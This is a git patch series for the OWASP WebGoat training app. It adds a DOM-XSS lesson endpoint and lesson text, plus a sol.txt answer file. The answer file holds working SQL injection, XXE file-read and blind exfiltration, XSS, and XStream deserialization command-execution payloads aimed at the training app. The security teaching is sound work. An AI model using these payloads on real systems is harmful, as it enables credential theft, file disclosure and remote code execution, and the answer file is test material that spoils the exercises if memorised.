 create mode 100644 webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScriptingFollowUp.java
 create mode 100644 webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6b.adoc

diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScripting.java b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScripting.java
index c4ceea5b4..7bd3456ff 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScripting.java
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScripting.java
@@ -21,7 +21,7 @@ public class DOMCrossSiteScripting extends AssignmentEndpoint {
     AttackResult completed(@RequestParam Integer param1,
                            @RequestParam Integer param2, HttpServletRequest request)  throws IOException {
         if (param1 == 42 && param2 == 24 && request.getHeader("webgoat-requested-by").equals("dom-xss-vuln")) {
-            System.out.println("DOM-XSS successful");
+            System.out.println("DOM-XSS successful, param1 is 42");
             return trackProgress(success().build());
         } else {
             return trackProgress(failed().build());
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScriptingFollowUp.java b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScriptingFollowUp.java
new file mode 100644
index 000000000..846c1eaa4
--- /dev/null
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScriptingFollowUp.java
@@ -0,0 +1,35 @@
+package org.owasp.webgoat.plugin;
+
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AssignmentPath;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+/**
+ * Created by jason on 11/23/16.
+ */
+@AssignmentPath("/CrossSiteScripting/dom-follow-up")
+public class DOMCrossSiteScriptingFollowUp extends AssignmentEndpoint {
+    @RequestMapping(method = RequestMethod.POST)
+    public @ResponseBody
+    AttackResult completed(@RequestParam String successMessage)  throws IOException {
+        if (successMessage.equals("DOM-XSS successful, param1 is 42")) {
+            return trackProgress(success().feedback("xss-dom-message-success").build());
+        } else {
+            return trackProgress(failed().feedback("xss-dom-message-success").build());
+        }
+    }
+}
+// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
+
+
+
+
+
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
index 884674f49..e754d0527 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
@@ -184,7 +184,8 @@
 	<div class="lesson-page-wrapper">
 		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content6.adoc"></div>
 	</div>
-	<div class="lesson-page-wrapper">
+
+    <div class="lesson-page-wrapper">
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
@@ -208,133 +209,161 @@
 			<!-- ... of course, you can move them if you want to, but that will not look consistent to other lessons -->
 		</div>
 	</div>
-	<div class="lesson-page-wrapper">
+
+    <div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+        <!-- include content here. Content will be presented via asciidocs files,
+        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+        <div class="adoc-content" th:replace="doc:CrossSiteScripting_content6b.adoc"></div>
+        <div class="attack-container">
+            <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+            <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
+            <!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
+            <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
+            <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
+            <form class="attack-form" accept-charset="UNKNOWN"
+                  method="POST" name="DOMFollowUp"
+                  action="/WebGoat/CrossSiteScripting/dom-follow-up"
+                  enctype="application/json;charset=UTF-8">
+                <input name="successMessage" value="" type="TEXT" />
+                <input name="submitMessage" value="Submit" type="SUBMIT"/>
+            </form>
+            <!-- do not remove the two following div's, this is where your feedback/output will land -->
+            <div class="attack-feedback"></div>
+            <div class="attack-output"></div>
+            <!-- ... of course, you can move them if you want to, but that will not look consistent to other lessons -->
+        </div>
+    </div>
+
+
+    <div class="lesson-page-wrapper">
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
 		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
 		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content7.adoc"></div>
 	</div>
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content8.adoc"></div>
-	</div>
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content9.adoc"></div>
-		<img align="middle" th:src="@{/plugin_lessons/plugin/CrossSiteScripting/images/Reflected-XSS.png}" />
-	</div>
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content8.adoc"></div>-->
+	<!--</div>-->
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content9.adoc"></div>-->
+		<!--<img align="middle" th:src="@{/plugin_lessons/plugin/CrossSiteScripting/images/Reflected-XSS.png}" />-->
+	<!--</div>-->
 
 
-	<div class="lesson-page-wrapper">
-		<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here. Content will be presented via asciidocs files,
-	        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content"
-			th:replace="doc:CrossSiteScripting_content9a.adoc"></div>
-		<div class="attack-container">
-			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
-			<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
+	<!--<div class="lesson-page-wrapper">-->
+		<!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here. Content will be presented via asciidocs files,-->
+	        <!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content"-->
+			<!--th:replace="doc:CrossSiteScripting_content9a.adoc"></div>-->
+		<!--<div class="attack-container">-->
+			<!--<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>-->
+			<!--&lt;!&ndash; using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat &ndash;&gt;-->
 
-			<!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
-			<!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
-			<!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
-			<form class="attack-form" accept-charset="UNKNOWN" method="POST"
-				name="form" action="/WebGoat/CrossSiteScripting/attack9a"
-				enctype="application/json;charset=UTF-8">
+			<!--&lt;!&ndash; using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat &ndash;&gt;-->
+			<!--&lt;!&ndash; you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework &ndash;&gt;-->
+			<!--&lt;!&ndash; of course, you can write your own ajax submission /handling in your own javascript if you like &ndash;&gt;-->
+			<!--<form class="attack-form" accept-charset="UNKNOWN" method="POST"-->
+				<!--name="form" action="/WebGoat/CrossSiteScripting/attack9a"-->
+				<!--enctype="application/json;charset=UTF-8">-->
 
-				<table cellspacing="0" cellpadding="0" border="0">
-					<tbody>
-						<tr>
-							<td>Title:</td>
-							<td><input name="title" value="" type="TEXT" /></td>
-						</tr>
-						<tr>
-							<td valign="TOP">Message:</td>
-							<td><textarea cols="60" name="message" rows="5"></textarea></td>
-						</tr>
-					</tbody>
-				</table>
-				<p>
-					<input name="SUBMIT" value="Submit" type="SUBMIT" />
-				</p>
-				<hr />
-				<hr />
-				<h1>Message List</h1>
-				<table cellspacing="0" cellpadding="0" border="0">
-					<tbody>
-						<tr>
-							<td><a href="#" style="cursor: hand" link="attack?Num=1"><u></u></a></td>
-						</tr>
-					</tbody>
-				</table>
-			</form>
+				<!--<table cellspacing="0" cellpadding="0" border="0">-->
+					<!--<tbody>-->
+						<!--<tr>-->
+							<!--<td>Title:</td>-->
+							<!--<td><input name="title" value="" type="TEXT" /></td>-->
+						<!--</tr>-->
+						<!--<tr>-->
+							<!--<td valign="TOP">Message:</td>-->
+							<!--<td><textarea cols="60" name="message" rows="5"></textarea></td>-->
+						<!--</tr>-->
+					<!--</tbody>-->
+				<!--</table>-->
+				<!--<p>-->
+					<!--<input name="SUBMIT" value="Submit" type="SUBMIT" />-->
+				<!--</p>-->
+				<!--<hr />-->
+				<!--<hr />-->
+				<!--<h1>Message List</h1>-->
+				<!--<table cellspacing="0" cellpadding="0" border="0">-->
+					<!--<tbody>-->
+						<!--<tr>-->
+							<!--<td><a href="#" style="cursor: hand" link="attack?Num=1"><u></u></a></td>-->
+						<!--</tr>-->
+					<!--</tbody>-->
+				<!--</table>-->
+			<!--</form>-->
 
-			<!-- do not remove the two following div's, this is where your feedback/output will land -->
-			<div class="attack-feedback"></div>
-			<div class="attack-output"></div>
-			<!-- ... of course, you can move them if you want to, but that will not look consistent to other lessons -->
-		</div>
-	</div>
+			<!--&lt;!&ndash; do not remove the two following div's, this is where your feedback/output will land &ndash;&gt;-->
+			<!--<div class="attack-feedback"></div>-->
+			<!--<div class="attack-output"></div>-->
+			<!--&lt;!&ndash; ... of course, you can move them if you want to, but that will not look consistent to other lessons &ndash;&gt;-->
+		<!--</div>-->
+	<!--</div>-->
 
 
 
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content10.adoc"></div>
-	</div>
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content11.adoc"></div>
-	</div>
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content12.adoc"></div>
-	</div>
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content13.adoc"></div>
-	</div>	
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content13a.adoc"></div>
-	</div>	
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content14.adoc"></div>
-	</div>	
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content15.adoc"></div>
-	</div>	
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content15a.adoc"></div>
-	</div>	
-	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content16.adoc"></div>
-	</div>	
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content10.adoc"></div>-->
+	<!--</div>-->
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content11.adoc"></div>-->
+	<!--</div>-->
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content12.adoc"></div>-->
+	<!--</div>-->
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content13.adoc"></div>-->
+	<!--</div>	-->
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content13a.adoc"></div>-->
+	<!--</div>	-->
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content14.adoc"></div>-->
+	<!--</div>	-->
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content15.adoc"></div>-->
+	<!--</div>	-->
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content15a.adoc"></div>-->
+	<!--</div>-->
+
+	<!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content16.adoc"></div>-->
+	<!--</div>	-->
 
 </html>
\ No newline at end of file
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6a.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6a.adoc
index 9d4ce0689..08176abe4 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6a.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6a.adoc
@@ -1,4 +1,4 @@
-== Try It!   DOM-Based XSS
+== Ientify Potential for DOM-Based XSS
 
 For this, you'll want to look for some 'test' code in the route handlers (javascript/backbone). Sometimes, test code gets left in.
 (Often times test code is very simple and lacks security or any quality controls!).
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6b.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6b.adoc
new file mode 100644
index 000000000..d66d36423
--- /dev/null
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6b.adoc
@@ -0,0 +1,9 @@
+== Try It!   DOM-Based XSS
+
+Some attacks are 'blind'. Fortunately, you have the server running here so you will be able to tell if you are successful. Use the route you just found and see if
+you can use the fact that it reflects a parameter from the route without encoding to execute an internal function in WebGoat. The function you want to execute is ...
+
+*webgoat.customjs.phoneHome()*
+
+Sure, you could just use console/debug to trigger it, but you need to trigger it via a URL in a new tab.  Once you complete it, paste the output message from the log below ...
+
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/i18n/WebGoatLabels.properties b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/i18n/WebGoatLabels.properties
index af10c440a..68d7f6267 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/i18n/WebGoatLabels.properties
@@ -6,5 +6,7 @@ xss-reflected-5b-failure=Nope, pretty easy to guess now though.
 xss-reflected-6a-success=Correct! Now, see if you can send in an exploit to that route in the next assignment.
 xss-reflected-6a-failure=No, look at the example. Check the GoatRouter.js file. It should be pretty easy to determine.
 xss.lesson1.failure=Are you sure? Try using a tab from a different site.
+xss-dom-message-success=Correct, I hope you didn't cheat, using the console!
+xss-dom-message-failure=Incorrect, keep trying. It should be obvious in the log when you are successful.
 
 #xss-reflected-5b-do5a-first=Do the reflected xss attack prior to this, then come back and answer this.
\ No newline at end of file

From 3193b591d84cd54b8892717d1bde1363dd5bc7d1 Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Fri, 17 Feb 2017 16:18:36 -0500
Subject: [PATCH 09/10] commenting out latter part of XSS for now

---
 .../CrossSiteScripting/html/CrossSiteScripting.html  | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
index e754d0527..a1ccd483c 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
@@ -236,12 +236,12 @@
     </div>
 
 
-    <div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content7.adoc"></div>
-	</div>
+    <!--<div class="lesson-page-wrapper">-->
+        <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
+		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->
+		<!--which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc &ndash;&gt;-->
+		<!--<div class="adoc-content" th:replace="doc:CrossSiteScripting_content7.adoc"></div>-->
+	<!--</div>-->
 	<!--<div class="lesson-page-wrapper">-->
         <!--&lt;!&ndash; reuse this lesson-page-wrapper block for each 'page' of content in your lesson &ndash;&gt;-->
 		<!--&lt;!&ndash; include content here, or can be placed in another location. Content will be presented via asciidocs files,-->

From 153dc57731a35cad9023dda62e85fc5d879f14b5 Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Fri, 17 Feb 2017 16:18:57 -0500
Subject: [PATCH 10/10] Basic solutions cheat file for now

---
 webgoat-lessons/sol.txt | 88 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 88 insertions(+)
 create mode 100644 webgoat-lessons/sol.txt

diff --git a/webgoat-lessons/sol.txt b/webgoat-lessons/sol.txt
new file mode 100644
index 000000000..9b1c2c0aa
--- /dev/null
+++ b/webgoat-lessons/sol.txt
@@ -0,0 +1,88 @@
+### SQLi ###
+Basic
+Smith  - to show it returns smith's records
+Smith' or '1'='1    - to show exploit; 1=1 can be any true clause
+
+[2:19 PM]  
+101
+101 or 1=1
+
+Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
+
+## XXE ##
+
+Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+
+Modern Rest Framework - change content type to: Content-Type: application/xml && 
+<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+
+Blind SendFile ...
+
+    /**
+     * Solution:
+     *
+     * Create DTD:
+     *
+     * <pre>
+     *     <?xml version="1.0" encoding="UTF-8"?>
+     *     <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
+     *     <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
+     *      %all;
+     * </pre>
+     *
+     * This will be reduced to:
+     *
+     * <pre>
+     *     <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
+     * </pre>
+     *
+     * Wire it all up in the xml send to the server:
+     *
+     * <pre>
+     *  <?xml version="1.0"?>
+     *  <!DOCTYPE root [
+     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
+     *  %remote;
+     *   ]>
+     *  <user>
+     *    <username>test&send;</username>
+     *  </user>
+     *
+     * </pre>
+     *
+     */
+
+###XSS ###
+
+<script>alert('my javascript here')</script>4128 3214 0002 1999
+
+DOM-XSS ...
+
+// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
+
+
+### Vuln - Components ###
+
+Jquery page:  - it is contrived; but paste that in each box
+OK<script>alert("XSS")<\/script>
+OK<script>alert("XSS")<\/script>
+
+for the deserialization:  got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/  to read about why it works so you can talk to it.
+
+<sorted-set>  
+ <string>foo</string>
+ <dynamic-proxy>
+   <interface>java.lang.Comparable</interface>
+   <handler class="java.beans.EventHandler">
+     <target class="java.lang.ProcessBuilder">
+       <command>
+         <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
+       </command>
+     </target>
+     <action>start</action>
+   </handler>
+ </dynamic-proxy>
+</sorted-set>
+
+